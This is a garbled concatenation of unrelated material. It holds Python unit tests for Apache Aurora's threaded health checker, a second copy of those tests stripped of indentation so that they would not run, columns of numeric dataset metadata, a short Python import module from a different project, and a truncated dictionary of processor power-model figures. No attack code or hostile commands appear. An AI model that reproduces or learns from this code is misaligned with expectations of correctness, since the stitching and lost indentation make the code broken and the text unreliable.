    self.health.side_effect = lambda: health_status.pop(0)
    mock_is_set = mock.Mock(spec=threading._Event.is_set)
    liveness = [False, False, False, False, True]
    mock_is_set.side_effect = lambda: liveness.pop(0)
    self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
    self.health_checker.threaded_health_checker.run()
    assert self.clock.sleep.call_count == 4
    assert self.health_checker.threaded_health_checker.current_consecutive_failures == 2
    assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
    assert self.health_checker.threaded_health_checker.running is True
    assert self.health_checker.threaded_health_checker.healthy is False
    assert self.health_checker.threaded_health_checker.reason == 'failure-5'

  @mock.patch('apache.aurora.executor.common.health_checker.ExceptionalThread.start',
              spec=ExceptionalThread.start)
  def test_start(self, mock_start):
    """start() delegates to ExceptionalThread.start exactly once."""
    assert mock_start.call_count == 0
    self.health_checker.threaded_health_checker.start()
    mock_start.assert_called_once_with(self.health_checker.threaded_health_checker)

  def test_stop(self):
    """stop() sets the dead event that terminates the run loop."""
    assert not self.health_checker.threaded_health_checker.dead.is_set()
    self.health_checker.threaded_health_checker.stop()
    assert self.health_checker.threaded_health_checker.dead.is_set()
class TestThreadedHealthCheckerWithDefaults(unittest.TestCase):
'''
Similar tests as above but with the default health check configuration. This
will ensure that the defaults are always valid.
'''
def setUp(self):
  # Health check callable that always reports healthy.
  self.health = mock.Mock()
  self.health.return_value = (True, 'Fake')
  self.sandbox = mock.Mock(spec_set=SandboxInterface)
  self.sandbox.exists.return_value = True
  self.sandbox.root = '/root'
  # Build the checker from a config with no health_check_config overrides so
  # the provider's defaults are exercised.
  self.health_checker = HealthCheckerProvider().from_assigned_task(
      AssignedTask(
          task=TaskConfig(
              executorConfig=ExecutorConfig(
                  name='thermos',
                  data=MESOS_JOB(task=HELLO_WORLD).json_dumps())),
          instanceId=1,
          assignedPorts={'health': 9001}),
      self.sandbox)
  # Swap in the mock so tests can count health check invocations.
  self.health_checker.threaded_health_checker.checker = self.health
def test_perform_check_if_not_disabled_snooze_file_is_none(self):
  """Without a snooze file configured, the underlying check always runs."""
  checker_thread = self.health_checker.threaded_health_checker
  checker_thread.snooze_file = None
  assert self.health.call_count == 0
  assert self.health_checker.metrics.sample()['snoozed'] == 0
  checker_thread._perform_check_if_not_disabled()
  # The check ran exactly once and was never counted as snoozed.
  assert self.health.call_count == 1
  assert self.health_checker.metrics.sample()['snoozed'] == 0
@mock.patch('os.path', spec_set=os.path)
def test_perform_check_if_not_disabled_no_snooze_file(self, mock_os_path):
  """If the snooze file path is set but absent on disk, the check still runs."""
  mock_os_path.isfile.return_value = False
  assert self.health.call_count == 0
  assert self.health_checker.metrics.sample()['snoozed'] == 0
  self.health_checker.threaded_health_checker._perform_check_if_not_disabled()
  assert self.health.call_count == 1
  assert self.health_checker.metrics.sample()['snoozed'] == 0
@mock.patch('os.path', spec_set=os.path)
def test_perform_check_if_not_disabled_snooze_file_exists(self, mock_os_path):
  """When the snooze file exists the check is skipped and reported healthy."""
  mock_os_path.isfile.return_value = True
  assert self.health.call_count == 0
  assert self.health_checker.metrics.sample()['snoozed'] == 0
  result = (
      self.health_checker.threaded_health_checker._perform_check_if_not_disabled())
  # The underlying check never ran; the snooze was counted and a healthy
  # result was synthesized.
  assert self.health.call_count == 0
  assert self.health_checker.metrics.sample()['snoozed'] == 1
  assert result == (True, None)
def test_maybe_update_health_check_count_reset_count(self):
hc = self.health_checker.threaded_health_checker
hc.attempts = hc.forgiving_attempts
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason-3')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
def test_maybe_update_health_check_count_ignore_failures_inside_grace_period(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
def test_maybe_update_health_check_count_dont_ignore_failures_after_grace_period(self):
hc = self.health_checker.threaded_health_checker
hc.attempts = hc.forgiving_attempts
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 2
assert hc.current_consecutive_successes == 0
def test_maybe_update_health_check_count_fail_fast(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.healthy is True
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-3')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
assert hc.running is False
assert hc.healthy is False
assert hc.reason == 'reason-3'
def test_maybe_update_health_check_count_max_failures(self):
hc = self.health_checker.threaded_health_checker
hc.attempts = hc.forgiving_attempts
hc.current_consecutive_successes = 1
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
assert hc.healthy is True
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
assert hc.healthy is False
assert hc.reason == 'reason-1'
def test_maybe_update_health_check_count_success(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.healthy is True
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
assert hc.running is True
assert hc.healthy is True
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_run_success(self, mock_sleep):
mock_sleep.return_value = None
self.health.return_value = (True, 'success')
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 0
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 3
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is True
assert self.health_checker.threaded_health_checker.reason is None
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_run_failure(self, mock_sleep):
mock_sleep.return_value = None
self.health.return_value = (False, 'failure')
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 1
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is False
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure'
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_first_success_after_grace_period_and_max_consecutive_failures(self, mock_sleep):
mock_sleep.return_value = None
health_status = [(False, 'failure-1'), (False, 'failure-2'), (True, None)]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 0
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 1
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is True
assert self.health_checker.threaded_health_checker.reason is None
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_success_then_failures_ignored_till_grace_period_ends(self, mock_sleep):
mock_sleep.return_value = None
health_status = [(True, None), (False, 'failure-2'), (False, 'failure-3')]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 1
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure-3'
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_run_failure_unhealthy_when_failfast(self, mock_sleep):
mock_sleep.return_value = None
health_status = [(False, 'failure-1'), (False, 'failure-2'), (False, 'failure-3')]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 1
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is False
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure-3'
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_run_unhealthy_after_callback(self, mock_sleep):
mock_sleep.return_value = None
health_status = [(True, None), (True, None), (False, 'failure-4'), (False, 'failure-5')]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 4
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 2
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure-5'
@mock.patch('apache.aurora.executor.common.health_checker.ExceptionalThread.start',
spec=ExceptionalThread.start)
def test_start(self, mock_start):
assert mock_start.call_count == 0
self.health_checker.threaded_health_checker.start()
mock_start.assert_called_once_with(self.health_checker.threaded_health_checker)
def test_stop(self):
assert not self.health_checker.threaded_health_checker.dead.is_set()
self.health_checker.threaded_health_checker.stop()
assert self.health_checker.threaded_health_checker.dead.is_set()
| 44.735651
| 100
| 0.740377
| 7,066
| 55,338
| 5.469714
| 0.048118
| 0.114699
| 0.105954
| 0.071257
| 0.896427
| 0.885637
| 0.872442
| 0.866517
| 0.856892
| 0.850294
| 0
| 0.009657
| 0.17104
| 55,338
| 1,236
| 101
| 44.771845
| 0.832865
| 0.035961
| 0
| 0.813931
| 0
| 0
| 0.052975
| 0.011463
| 0
| 0
| 0
| 0
| 0.354962
| 1
| 0.054389
| false
| 0
| 0.016221
| 0.001908
| 0.078244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3b91ae918fb0454637e17919bfa1a1817eb078b
| 197
|
py
|
Python
|
backend/core/views/__init__.py
|
linea-it/pz-server
|
20b75baae8afd2d3e5ede6fbcd71ebe54918a7cd
|
[
"MIT"
] | 3
|
2021-09-21T21:00:51.000Z
|
2022-03-24T19:36:39.000Z
|
backend/core/views/__init__.py
|
linea-it/pz-server
|
20b75baae8afd2d3e5ede6fbcd71ebe54918a7cd
|
[
"MIT"
] | null | null | null |
backend/core/views/__init__.py
|
linea-it/pz-server
|
20b75baae8afd2d3e5ede6fbcd71ebe54918a7cd
|
[
"MIT"
] | null | null | null |
from core.views.release import ReleaseViewSet
from core.views.product_type import ProductTypeViewSet
from core.views.product import ProductViewSet
from core.views.github_auth import TestGithubAuth
| 39.4
| 54
| 0.878173
| 26
| 197
| 6.576923
| 0.5
| 0.187135
| 0.304094
| 0.233918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081218
| 197
| 4
| 55
| 49.25
| 0.944751
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43019fa53da9679d3c3989c61f8a90ca850bf8f8
| 68,676
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_mylocality/cmp_GemsFDTD/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_mylocality/cmp_GemsFDTD/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_mylocality/cmp_GemsFDTD/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0648189,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.2536,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.381762,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.189343,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.327873,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.188044,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.70526,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.128628,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.77849,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0721231,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00686382,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0726115,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0507621,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.144735,
'Execution Unit/Register Files/Runtime Dynamic': 0.0576259,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.193217,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.542007,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 1.96387,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000127827,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000127827,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000110579,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 4.23925e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000729202,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00109543,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00125267,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0487989,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.10403,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.117802,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.165743,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.4755,
'Instruction Fetch Unit/Runtime Dynamic': 0.334692,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.139584,
'L2/Runtime Dynamic': 0.0373435,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.28224,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.02999,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0661645,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0661645,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.59596,
'Load Store Unit/Runtime Dynamic': 1.42245,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.16315,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.326301,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0579026,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0599921,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.192997,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0193326,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.451598,
'Memory Management Unit/Runtime Dynamic': 0.0793248,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 20.0028,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.251621,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0127098,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0953364,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
